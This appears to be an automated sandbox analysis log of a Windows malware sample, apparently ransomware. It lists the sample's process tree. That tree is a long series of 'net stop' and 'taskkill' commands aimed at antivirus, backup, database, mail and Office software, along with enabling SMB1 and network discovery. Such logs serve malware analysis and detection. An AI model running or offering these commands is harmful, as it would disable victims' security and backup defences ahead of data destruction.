C:\Windows\SysWOW64\net.exe"net.exe" stop McTaskManager /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop McTaskManager /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop VeeamRESTSvc /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VeeamRESTSvc /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop McShield /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop McShield /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop sophos /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop sophos /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop VeeamDeploySvc /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VeeamDeploySvc /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop VeeamEnterpriseManagerSvc /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VeeamEnterpriseManagerSvc /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MBEndpointAgent /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MBEndpointAgent /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQLSERVER /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQLSERVER /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSExchangeIS /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangeIS /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop stc_raw_agent /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop stc_raw_agent /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLAgent$CXDB /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLAgent$CXDB /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop “Sophos AutoUpdate Service” /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop “Sophos AutoUpdate Service” /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop ReportServer /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop ReportServer /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SAVAdminService /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SAVAdminService /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SamSs /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SamSs /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop “Acronis VSS Provider” /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop “Acronis VSS Provider” /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SAVService /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SAVService /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MsDtsServer /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MsDtsServer /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SepMasterService /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SepMasterService /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop UI0Detect /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop UI0Detect /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLAgent$ECWDB2 /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLAgent$ECWDB2 /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop IISAdmin /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop IISAdmin /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop “SQLsafe Backup Service” /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop “SQLsafe Backup Service” /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLAgent$PRACTTICEBGC /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLAgent$PRACTTICEBGC /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MsDtsServer110 /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MsDtsServer110 /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLAgent$PRACTTICEMGT /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLAgent$PRACTTICEMGT /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSExchangeSA /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangeSA /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLAgent$SYSTEM_BGC /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLAgent$SYSTEM_BGC /y3⤵
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" & Enable-WindowsOptionalFeature -Online -FeatureName SMB1Protocol2⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSExchangeES /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangeES /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop POP3Svc /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop POP3Svc /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLAgent$PROD /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLAgent$PROD /y3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c net view2⤵
-
C:\Windows\SysWOW64\net.exenet view3⤵
- Discovers systems in the same network
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop ReportServer$TPSAMA /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop ReportServer$TPSAMA /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop “Sophos Health Service” /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop “Sophos Health Service” /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSExchangeSRS /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangeSRS /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop W3Svc /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop W3Svc /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSOLAP$SYSTEM_BGC /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSOLAP$SYSTEM_BGC /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLAgent$SBSMONITORING /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLAgent$SBSMONITORING /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SmcService /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SmcService /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLAgent$PROFXENGAGEMENT /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLAgent$PROFXENGAGEMENT /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop Smcinst /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop Smcinst /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop ShMonitor /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop ShMonitor /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop “Veeam Backup Catalog Data Service” /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop “Veeam Backup Catalog Data Service” /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop ReportServer$TPS /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop ReportServer$TPS /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop “Sophos File Scanner Service” /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop “Sophos File Scanner Service” /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop swi_filter /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop swi_filter /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSExchangeMGMT /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangeMGMT /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop “Sophos Agent” /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop “Sophos Agent” /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SntpService /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SntpService /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SMTPSvc /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SMTPSvc /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop “Sophos Clean Service” /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop “Sophos Clean Service” /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLAgent$TPS /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLAgent$TPS /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop “Zoolz 2 Service” /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop “Zoolz 2 Service” /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop tmlisten /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop tmlisten /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop TrueKeyScheduler /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop TrueKeyScheduler /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLTELEMETRY /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLTELEMETRY /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop WRSVC /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop WRSVC /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop vapiendpoint /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop vapiendpoint /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop mssql$vim_sqlexp /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop mssql$vim_sqlexp /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLTELEMETRY$ECWDB2 /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLTELEMETRY$ECWDB2 /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop TrueKeyServiceHelper /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop TrueKeyServiceHelper /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLSERVERAGENT /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLSERVERAGENT /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop TrueKey /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop TrueKey /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLSafeOLRService /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLSafeOLRService /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLBrowser /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLBrowser /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop TmCCSF /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop TmCCSF /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLAgent$VEEAMSQL2012 /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2012 /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop swi_update_64 /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop swi_update_64 /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLAgent$VEEAMSQL2008R2 /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2008R2 /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop swi_update /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop swi_update /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLAgent$TPSAMA /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLAgent$TPSAMA /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop swi_service /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop swi_service /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop “aphidmonitorservice” /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop “aphidmonitorservice” /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLAgent$SOPHOS /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLAgent$SOPHOS /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLAgent$SQLEXPRESS /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLAgent$SQLEXPRESS /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop svcGenericHost /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop svcGenericHost /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLAgent$SQL_2008 /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLAgent$SQL_2008 /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop sophossps /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop sophossps /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BackupExecAgentBrowser /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecAgentBrowser /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQL$PRACTTICEBGC /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$PRACTTICEBGC /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BackupExecManagementService /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecManagementService /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BackupExecRPCService /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecRPCService /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop AVP /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop AVP /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop DCAgent /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop DCAgent /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQL$SHAREPOINT /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$SHAREPOINT /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BackupExecVSSProvider /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecVSSProvider /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQL$SBSMONITORING /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$SBSMONITORING /y3⤵
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQL$SBSMONITORING /2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$SBSMONITORING /3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SstpSvc /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SstpSvc /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop msftesql$PROD /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop msftesql$PROD /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop Antivirus /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop Antivirus /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQL$PROFXENGAGEMENT /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$PROFXENGAGEMENT /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop AcronisAgent /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop AcronisAgent /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQL$PROD /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$PROD /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BackupExecJobEngine /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecJobEngine /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop “Sophos Web Control Service” /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop “Sophos Web Control Service” /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop msexchangeadtopology /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop msexchangeadtopology /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop “Sophos Device Control Service” /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop “Sophos Device Control Service” /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSExchangeMTA /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangeMTA /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BackupExecDeviceMediaService /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecDeviceMediaService /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop “Sophos System Protection Service” /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop “Sophos System Protection Service” /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQL$PRACTICEMGT /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$PRACTICEMGT /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop “Sophos Safestore Service” /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop “Sophos Safestore Service” /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop audioendpointbuilder /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop audioendpointbuilder /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQL$ECWDB2 /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$ECWDB2 /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLAgent$SHAREPOINT /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLAgent$SHAREPOINT /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop EraserSvc11710 /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop EraserSvc11710 /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop “SQLsafe Filter Service” /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop “SQLsafe Filter Service” /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BackupExecAgentAccelerator /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecAgentAccelerator /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSOLAP$TPS /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSOLAP$TPS /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop ReportServer$SQL_2008 /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop ReportServer$SQL_2008 /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop ReportServer$SYSTEM_BGC /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop ReportServer$SYSTEM_BGC /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop “intel(r) proset monitoring service” /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop “intel(r) proset monitoring service” /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop ARSM /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop ARSM /y3⤵
-
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM sqbcoreservice.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM encsvc.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM tbirdconfig.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM ocomm.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM zoolz.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM xfssvccon.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM dbsnmp.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM sqlbrowser.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM sqlservr.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mspub.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM onenote.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM outlook.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM thebat.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM msaccess.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM PccNTMon.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM isqlplussvc.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM Ntrtscan.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM sqlagent.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM oracle.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM ocssd.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM synctime.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" IM thunderbird.exe /F2⤵
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM powerpnt.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mydesktopservice.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM winword.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM visio.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mydesktopqos.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM msftesql.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM tmlisten.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mbamtray.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM infopath.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM thebat64.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM dbeng50.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM sqlwriter.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM CNTAoSMgr.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mysqld-nt.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM wordpad.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM excel.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM steam.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
